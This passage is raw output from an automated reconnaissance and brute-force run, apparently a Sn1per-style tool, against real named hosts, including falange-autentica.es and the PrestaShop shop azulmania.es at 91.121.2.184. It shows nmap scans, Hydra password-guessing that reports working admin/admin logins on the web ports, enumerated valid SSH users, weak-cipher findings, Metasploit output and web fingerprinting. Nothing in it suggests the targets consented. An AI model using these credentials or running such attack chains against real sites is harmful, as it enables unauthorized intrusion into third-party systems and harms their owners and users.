  1865. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1866. PORT STATE SERVICE
  1867. 22/tcp open ssh
  1868. 80/tcp open http
  1869. 389/tcp open ldap
  1870. 443/tcp open https
  1871. 993/tcp open imaps
  1872. 8080/tcp open http-proxy
  1873.  
  1874. Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
  1875.  
  1876. ################################### Running Brute Force ###############################################################################
  1877.  
  1878. + -- --=[Port 21 closed... skipping.
  1879. + -- --=[Port 22 opened... running tests...
  1880. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1881.  
  1882. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:00
  1883. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  1884. [DATA] attacking ssh://falange-autentica.es:22/
  1885. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1886.  
  1887. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:14
  1888. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1889. [DATA] attacking ssh://falange-autentica.es:22/
  1890. + -- --=[Port 23 closed... skipping.
  1891. + -- --=[Port 25 closed... skipping.
  1892. + -- --=[Port 80 opened... running tests...
  1893. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1894.  
  1895. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:28
  1896. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1897. [DATA] attacking http-get://falange-autentica.es:80//
  1898. [80][http-get] host: falange-autentica.es login: admin password: admin
  1899. [STATUS] attack finished for falange-autentica.es (valid pair found)
  1900. 1 of 1 target successfully completed, 1 valid password found
  1901. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:50:52
  1902. + -- --=[Port 110 closed... skipping.
  1903. + -- --=[Port 139 closed... skipping.
  1904. + -- --=[Port 162 closed... skipping.
  1905. + -- --=[Port 389 opened... running tests...
  1906. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1907.  
  1908. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
  1909. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1910.  
  1911. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
  1912. + -- --=[Port 443 opened... running tests...
  1913. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1914.  
  1915. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
  1916. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1917. [DATA] attacking http-gets://falange-autentica.es:443//
  1918. [443][http-get] host: falange-autentica.es login: admin password: admin
  1919. [STATUS] attack finished for falange-autentica.es (valid pair found)
  1920. 1 of 1 target successfully completed, 1 valid password found
  1921. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:07
  1922. + -- --=[Port 445 closed... skipping.
  1923. + -- --=[Port 512 closed... skipping.
  1924. + -- --=[Port 513 closed... skipping.
  1925. + -- --=[Port 514 closed... skipping.
  1926. + -- --=[Port 993 opened... running tests...
  1927. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1928.  
  1929. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:07
  1930. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1931. [DATA] attacking imaps://falange-autentica.es:993/993
  1932. [STATUS] 131.00 tries/min, 131 tries in 00:01h, 1402 to do in 00:11h, 1 active
  1933. [STATUS] 133.33 tries/min, 400 tries in 00:03h, 1133 to do in 00:09h, 1 active
  1934. [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
  1935. 1 of 1 target completed, 0 valid passwords found
  1936. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 18:02:37
  1937. + -- --=[Port 1433 closed... skipping.
  1938. + -- --=[Port 1521 closed... skipping.
  1939. + -- --=[Port 3306 closed... skipping.
  1940. + -- --=[Port 3389 closed... skipping.
  1941. + -- --=[Port 5432 closed... skipping.
  1942. + -- --=[Port 5900 closed... skipping.
  1943. + -- --=[Port 5901 closed... skipping.
  1944. + -- --=[Port 8000 closed... skipping.
  1945. + -- --=[Port 8080 opened... running tests...
  1946. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1947.  
  1948. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 18:02:37
  1949. + -- --=[Port 8100 closed... skipping.
  1950. + -- --=[Port 6667 closed... skipping.
  1951.  
  1952. ################################### Done! ###########################################
  1953.  
  1954. * default
  1955. * default
  1956. [*] Importing 'Nmap XML' data
  1957. [*] Import: Parsing with 'Nokogiri v1.8.5'
  1958. [*] Importing host 91.121.2.184
  1959. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es.xml
  1960. [*] Importing 'Nmap XML' data
  1961. [*] Import: Parsing with 'Nokogiri v1.8.5'
  1962. [*] Importing host 91.121.2.184
  1963. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es-udp.xml
  1964. [*] Importing 'Nmap XML' data
  1965. [*] Import: Parsing with 'Nokogiri v1.8.5'
  1966. [*] Importing host 91.121.2.184
  1967. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-udp-falange-autentica.es.xml
  1968.  
  1969. Hosts
  1970. =====
  1971.  
  1972. address mac name os_name os_flavor os_sp purpose info comments
  1973. ------- --- ---- ------- --------- ----- ------- ---- --------
  1974. 91.121.2.184 Linux 2.6.X server
  1975. 195.55.47.89 Windows 3.X device
  1976.  
  1977. Services
  1978. ========
  1979.  
  1980. host port proto name state info
  1981. ---- ---- ----- ---- ----- ----
  1982. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
  1983. 91.121.2.184 25 tcp smtp closed
  1984. 91.121.2.184 53 udp domain unknown
  1985. 91.121.2.184 67 udp dhcps unknown
  1986. 91.121.2.184 68 udp dhcpc unknown
  1987. 91.121.2.184 69 udp tftp unknown
  1988. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
  1989. 91.121.2.184 88 udp kerberos-sec unknown
  1990. 91.121.2.184 123 udp ntp unknown
  1991. 91.121.2.184 137 udp netbios-ns filtered
  1992. 91.121.2.184 138 udp netbios-dgm filtered
  1993. 91.121.2.184 139 tcp netbios-ssn closed
  1994. 91.121.2.184 139 udp netbios-ssn unknown
  1995. 91.121.2.184 161 udp snmp unknown
  1996. 91.121.2.184 162 udp snmptrap unknown
  1997. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
  1998. 91.121.2.184 389 udp ldap unknown
  1999. 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
  2000. 91.121.2.184 445 tcp microsoft-ds closed
  2001. 91.121.2.184 465 tcp ssl/smtps open
  2002. 91.121.2.184 520 udp route unknown
  2003. 91.121.2.184 993 tcp ssl/imaps open
  2004. 91.121.2.184 2049 udp nfs unknown
  2005. 91.121.2.184 7071 tcp ssl/iwg1 open
  2006. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
  2007. 195.55.47.89 25 tcp smtp closed
  2008. 195.55.47.89 53 udp domain unknown
  2009. 195.55.47.89 67 udp dhcps unknown
  2010. 195.55.47.89 68 udp dhcpc unknown
  2011. 195.55.47.89 69 udp tftp unknown
  2012. 195.55.47.89 80 tcp http-proxy open Squid http proxy
  2013. 195.55.47.89 88 udp kerberos-sec unknown
  2014. 195.55.47.89 113 tcp ident closed
  2015. 195.55.47.89 123 udp ntp unknown
  2016. 195.55.47.89 137 udp netbios-ns filtered
  2017. 195.55.47.89 138 udp netbios-dgm filtered
  2018. 195.55.47.89 139 tcp netbios-ssn closed
  2019. 195.55.47.89 139 udp netbios-ssn unknown
  2020. 195.55.47.89 161 udp snmp unknown
  2021. 195.55.47.89 162 udp snmptrap unknown
  2022. 195.55.47.89 389 udp ldap unknown
  2023. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
  2024. 195.55.47.89 445 tcp microsoft-ds closed
  2025. 195.55.47.89 520 udp route unknown
  2026. 195.55.47.89 2049 udp nfs unknown
  2027. #######################################################################################################################################
  2028.  
  2029. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
  2030. Nmap scan report for 91.121.2.184
  2031. Host is up (0.11s latency).
  2032. Not shown: 465 filtered ports, 3 closed ports
  2033. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2034. PORT STATE SERVICE
  2035. 22/tcp open ssh
  2036. 80/tcp open http
  2037. 389/tcp open ldap
  2038. 443/tcp open https
  2039. 465/tcp open smtps
  2040. 993/tcp open imaps
  2041. 7071/tcp open iwg1
  2042. 8080/tcp open http-proxy
  2043. #######################################################################################################################################
  2044. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
  2045. Nmap scan report for 91.121.2.184
  2046. Host is up (0.12s latency).
  2047. Not shown: 2 filtered ports
  2048. PORT STATE SERVICE
  2049. 53/udp open|filtered domain
  2050. 67/udp open|filtered dhcps
  2051. 68/udp open|filtered dhcpc
  2052. 69/udp open|filtered tftp
  2053. 88/udp open|filtered kerberos-sec
  2054. 123/udp open|filtered ntp
  2055. 139/udp open|filtered netbios-ssn
  2056. 161/udp open|filtered snmp
  2057. 162/udp open|filtered snmptrap
  2058. 389/udp open|filtered ldap
  2059. 520/udp open|filtered route
  2060. 2049/udp open|filtered nfs
  2061.  
  2062. Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
  2063. #######################################################################################################################################
  2064. # general
  2065. (gen) banner: SSH-2.0-OpenSSH_5.3
  2066. (gen) software: OpenSSH 5.3
  2067. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  2068. (gen) compression: enabled (zlib@openssh.com)
  2069.  
  2070. # key exchange algorithms
  2071. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  2072. `- [info] available since OpenSSH 4.4
  2073. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2074. `- [warn] using weak hashing algorithm
  2075. `- [info] available since OpenSSH 2.3.0
  2076. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  2077. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  2078. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2079. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  2080. `- [warn] using small 1024-bit modulus
  2081. `- [warn] using weak hashing algorithm
  2082. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  2083.  
  2084. # host-key algorithms
  2085. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  2086. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  2087. `- [warn] using small 1024-bit modulus
  2088. `- [warn] using weak random number generator could reveal the key
  2089. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2090.  
  2091. # encryption algorithms (ciphers)
  2092. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2093. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  2094. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2095. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2096. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2097. `- [warn] using weak cipher
  2098. `- [info] available since OpenSSH 4.2
  2099. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2100. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2101. `- [warn] using weak cipher
  2102. `- [info] available since OpenSSH 4.2
  2103. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2104. `- [warn] using weak cipher mode
  2105. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  2106. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2107. `- [warn] using weak cipher
  2108. `- [warn] using weak cipher mode
  2109. `- [warn] using small 64-bit block size
  2110. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2111. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2112. `- [fail] disabled since Dropbear SSH 0.53
  2113. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2114. `- [warn] using weak cipher mode
  2115. `- [warn] using small 64-bit block size
  2116. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2117. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2118. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2119. `- [warn] using weak cipher mode
  2120. `- [warn] using small 64-bit block size
  2121. `- [info] available since OpenSSH 2.1.0
  2122. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2123. `- [warn] using weak cipher mode
  2124. `- [info] available since OpenSSH 2.3.0
  2125. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2126. `- [warn] using weak cipher mode
  2127. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  2128. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2129. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2130. `- [warn] using weak cipher
  2131. `- [info] available since OpenSSH 2.1.0
  2132. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2133. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2134. `- [warn] using weak cipher mode
  2135. `- [info] available since OpenSSH 2.3.0
  2136.  
  2137. # message authentication code algorithms
  2138. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2139. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2140. `- [warn] using encrypt-and-MAC mode
  2141. `- [warn] using weak hashing algorithm
  2142. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2143. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  2144. `- [warn] using weak hashing algorithm
  2145. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2146. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  2147. `- [warn] using small 64-bit tag size
  2148. `- [info] available since OpenSSH 4.7
  2149. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  2150. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2151. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  2152. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2153. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2154. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2155. `- [warn] using encrypt-and-MAC mode
  2156. `- [info] available since OpenSSH 2.5.0
  2157. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2158. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2159. `- [warn] using encrypt-and-MAC mode
  2160. `- [info] available since OpenSSH 2.1.0
  2161. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2162. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2163. `- [warn] using encrypt-and-MAC mode
  2164. `- [warn] using weak hashing algorithm
  2165. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  2166. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2167. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2168. `- [warn] using encrypt-and-MAC mode
  2169. `- [warn] using weak hashing algorithm
  2170. `- [info] available since OpenSSH 2.5.0
  2171.  
  2172. # algorithm recommendations (for OpenSSH 5.3)
  2173. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  2174. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  2175. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  2176. (rec) -ssh-dss -- key algorithm to remove
  2177. (rec) -arcfour -- enc algorithm to remove
  2178. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  2179. (rec) -blowfish-cbc -- enc algorithm to remove
  2180. (rec) -3des-cbc -- enc algorithm to remove
  2181. (rec) -aes256-cbc -- enc algorithm to remove
  2182. (rec) -arcfour256 -- enc algorithm to remove
  2183. (rec) -cast128-cbc -- enc algorithm to remove
  2184. (rec) -aes192-cbc -- enc algorithm to remove
  2185. (rec) -arcfour128 -- enc algorithm to remove
  2186. (rec) -aes128-cbc -- enc algorithm to remove
  2187. (rec) -hmac-md5-96 -- mac algorithm to remove
  2188. (rec) -hmac-ripemd160 -- mac algorithm to remove
  2189. (rec) -hmac-sha1-96 -- mac algorithm to remove
  2190. (rec) -umac-64@openssh.com -- mac algorithm to remove
  2191. (rec) -hmac-md5 -- mac algorithm to remove
  2192. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  2193. (rec) -hmac-sha1 -- mac algorithm to remove
  2194. #######################################################################################################################################
  2195. ftp is a valid user!
  2196. mail is a valid user!
  2197. mysql is a valid user!
  2198. nobody is a valid user!
  2199. postfix is a valid user!
  2200. root is a valid user!
  2201. #######################################################################################################################################
  2202.  
  2203. libssh scanner 1.0.4
  2204.  
  2205. Searching for Vulnerable Hosts...
  2206.  
  2207. [*] 91.121.2.184:22 is not vulnerable to authentication bypass (SSH-2.0-OpenSSH_5.3)
  2208.  
  2209. Scanner Completed Successfully
  2210. #######################################################################################################################################
  2211. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:10 EST
  2212. NSE: [ssh-run] Failed to specify credentials and command to run.
  2213. Nmap scan report for 91.121.2.184
  2214. Host is up (0.12s latency).
  2215.  
  2216. PORT STATE SERVICE VERSION
  2217. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  2218. | ssh-auth-methods:
  2219. | Supported authentication methods:
  2220. | publickey
  2221. | gssapi-keyex
  2222. |_ gssapi-with-mic
  2223. |_ssh-brute: Password authentication not allowed
  2224. | ssh-hostkey:
  2225. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  2226. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  2227. | ssh-publickey-acceptance:
  2228. |_ Accepted Public Keys: No public keys accepted
  2229. |_ssh-run: Failed to specify credentials and command to run.
  2230. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2231. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
  2232. No exact OS matches for host (test conditions non-ideal).
  2233. Network Distance: 8 hops
  2234.  
  2235. TRACEROUTE (using port 22/tcp)
  2236. HOP RTT ADDRESS
  2237. 1 127.27 ms 10.251.200.1
  2238. 2 127.56 ms 185.94.189.129
  2239. 3 ...
  2240. 4 138.51 ms 94.23.122.146
  2241. 5 ...
  2242. 6 137.53 ms 94.23.122.73
  2243. 7 ...
  2244. 8 137.39 ms 91.121.2.184
  2245. #######################################################################################################################################
  2246. USER_FILE => /brutex/wordlists/simple-users.txt
  2247. RHOSTS => 91.121.2.184
  2248. RHOST => 91.121.2.184
  2249. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
  2250. [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
  2251. [*] Auxiliary module execution completed
  2252. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  2253. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  2254. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
  2255. [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
  2256. #######################################################################################################################################
  2257. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:11 EST
  2258. Nmap scan report for 91.121.2.184
  2259. Host is up (0.12s latency).
  2260.  
  2261. PORT STATE SERVICE VERSION
  2262. 67/udp open|filtered dhcps
  2263. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  2264. Too many fingerprints match this host to give specific OS details
  2265. Network Distance: 8 hops
  2266.  
  2267. TRACEROUTE (using proto 1/icmp)
  2268. HOP RTT ADDRESS
  2269. 1 106.53 ms 10.251.200.1
  2270. 2 106.59 ms 185.94.189.129
  2271. 3 ...
  2272. 4 117.88 ms 94.23.122.146
  2273. 5 ...
  2274. 6 116.62 ms 91.121.131.219
  2275. 7 ...
  2276. 8 116.71 ms 91.121.2.184
  2277. #######################################################################################################################################
  2278. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:14 EST
  2279. Nmap scan report for 91.121.2.184
  2280. Host is up (0.11s latency).
  2281.  
  2282. PORT STATE SERVICE VERSION
  2283. 68/udp open|filtered dhcpc
  2284. Too many fingerprints match this host to give specific OS details
  2285. Network Distance: 8 hops
  2286.  
  2287. TRACEROUTE (using proto 1/icmp)
  2288. HOP RTT ADDRESS
  2289. 1 105.06 ms 10.251.200.1
  2290. 2 117.37 ms 185.94.189.129
  2291. 3 ...
  2292. 4 116.58 ms 94.23.122.146
  2293. 5 ...
  2294. 6 115.16 ms 91.121.131.219
  2295. 7 ...
  2296. 8 115.21 ms 91.121.2.184
  2297. #######################################################################################################################################
  2298. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:16 EST
  2299. Nmap scan report for 91.121.2.184
  2300. Host is up (0.11s latency).
  2301.  
  2302. PORT STATE SERVICE VERSION
  2303. 69/udp open|filtered tftp
  2304. Too many fingerprints match this host to give specific OS details
  2305. Network Distance: 8 hops
  2306.  
  2307. TRACEROUTE (using proto 1/icmp)
  2308. HOP RTT ADDRESS
  2309. 1 104.27 ms 10.251.200.1
  2310. 2 104.33 ms 185.94.189.129
  2311. 3 ...
  2312. 4 116.06 ms 94.23.122.146
  2313. 5 ...
  2314. 6 114.70 ms 91.121.131.219
  2315. 7 ...
  2316. 8 114.69 ms 91.121.2.184
  2317. #######################################################################################################################################
  2318.  
  2326.  
  2327. WAFW00F - Web Application Firewall Detection Tool
  2328.  
  2329. By Sandro Gauci && Wendel G. Henrique
  2330.  
  2331. Checking http://91.121.2.184
  2332. Generic Detection results:
  2333. No WAF detected by the generic detection
  2334. Number of requests: 14
  2335. #######################################################################################################################################
  2336. http://91.121.2.184 [302 Found] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
  2337. http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
  2338. https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
  2339. https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
  2340. ######################################################################################################################################
  2341. wig - WebApp Information Gatherer
  2342.  
  2343.  
  2344. Scanning https://azulmania.es...
  2345. _____________________ SITE INFO _____________________
  2346. IP Title
  2347. 91.121.2.184 Azulmanía - Azulmanía
  2348.  
  2349. ______________________ VERSION ______________________
  2350. Name Versions Type
  2351. PrestaShop 1.6.1.1 CMS
  2352. Apache Platform
  2353. PHP 5.6.14 Platform
  2354. openSUSE tumbleweed OS
  2355.  
  2356. ____________________ INTERESTING ____________________
  2357. URL Note Type
  2358. /robots.txt robots.txt index Interesting
  2359.  
  2360. _____________________________________________________
  2361. Time: 48.8 sec Urls: 224 Fingerprints: 40401
  2362. #######################################################################################################################################
  2363. HTTP/1.1 302 Found
  2364. Date: Wed, 07 Nov 2018 22:20:25 GMT
  2365. X-Powered-By: PHP/5.6.14
  2366. Location: http://azulmania.es/
  2367. Vary: Accept-Encoding
  2368. Content-Encoding: gzip
  2369. Content-Length: 20
  2370. Content-Type: text/html; charset=utf-8
  2371. X-Pad: avoid browser bug
  2372. Connection: keep-alive
  2373. #######################################################################################################################################
  2374. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:20 EST
  2375. Nmap scan report for 91.121.2.184
  2376. Host is up (0.11s latency).
  2377.  
  2378. PORT STATE SERVICE VERSION
  2379. 123/udp open|filtered ntp
  2380. Too many fingerprints match this host to give specific OS details
  2381. Network Distance: 8 hops
  2382.  
  2383. TRACEROUTE (using proto 1/icmp)
  2384. HOP RTT ADDRESS
  2385. 1 106.48 ms 10.251.200.1
  2386. 2 106.51 ms 185.94.189.129
  2387. 3 ...
  2388. 4 117.78 ms 94.23.122.146
  2389. 5 ...
  2390. 6 116.75 ms 91.121.131.219
  2391. 7 ...
  2392. 8 116.52 ms 91.121.2.184
  2393. #######################################################################################################################################
  2394. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:23 EST
  2395. Nmap scan report for 91.121.2.184
  2396. Host is up (0.11s latency).
  2397.  
  2398. PORT STATE SERVICE VERSION
  2399. 161/tcp filtered snmp
  2400. 161/udp open|filtered snmp
  2401. Too many fingerprints match this host to give specific OS details
  2402. Network Distance: 8 hops
  2403.  
  2404. TRACEROUTE (using proto 1/icmp)
  2405. HOP RTT ADDRESS
  2406. 1 108.83 ms 10.251.200.1
  2407. 2 190.00 ms 185.94.189.129
  2408. 3 ...
  2409. 4 119.80 ms 94.23.122.146
  2410. 5 ...
  2411. 6 113.27 ms 91.121.131.219
  2412. 7 ...
  2413. 8 113.18 ms 91.121.2.184
  2414. #######################################################################################################################################
  2415. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:25 EST
  2416. Nmap scan report for 91.121.2.184
  2417. Host is up (0.11s latency).
  2418.  
  2419. PORT STATE SERVICE VERSION
  2420. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
  2421. | ldap-rootdse:
  2422. | LDAP Results
  2423. | <ROOT>
  2424. | namingContexts:
  2425. | supportedControl: 1.3.6.1.4.1.4203.666.5.18
  2426. | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
  2427. | supportedControl: 1.3.6.1.4.1.21008.108.63.1
  2428. | supportedControl: 2.16.840.1.113730.3.4.18
  2429. | supportedControl: 2.16.840.1.113730.3.4.2
  2430. | supportedControl: 1.3.6.1.4.1.4203.666.5.12
  2431. | supportedControl: 1.3.6.1.4.1.4203.666.5.2
  2432. | supportedControl: 1.3.6.1.4.1.4203.1.10.1
  2433. | supportedControl: 1.2.840.113556.1.4.1340
  2434. | supportedControl: 1.2.840.113556.1.4.805
  2435. | supportedControl: 1.2.840.113556.1.4.1413
  2436. | supportedControl: 1.3.6.1.4.1.4203.666.5.15
  2437. | supportedControl: 1.2.840.113556.1.4.1339
  2438. | supportedControl: 1.2.840.113556.1.4.319
  2439. | supportedControl: 1.2.826.0.1.3344810.2.3
  2440. | supportedControl: 1.3.6.1.1.13.2
  2441. | supportedControl: 1.3.6.1.1.13.1
  2442. | supportedControl: 1.3.6.1.1.12
  2443. | supportedExtension: 1.3.6.1.4.1.1466.20037
  2444. | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
  2445. | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
  2446. | supportedExtension: 1.3.6.1.1.8
  2447. | supportedLDAPVersion: 3
  2448. | supportedSASLMechanisms: SCRAM-SHA-1
  2449. | supportedSASLMechanisms: GSSAPI
  2450. | supportedSASLMechanisms: DIGEST-MD5
  2451. | supportedSASLMechanisms: OTP
  2452. | supportedSASLMechanisms: CRAM-MD5
  2453. |_ subschemaSubentry: cn=Subschema
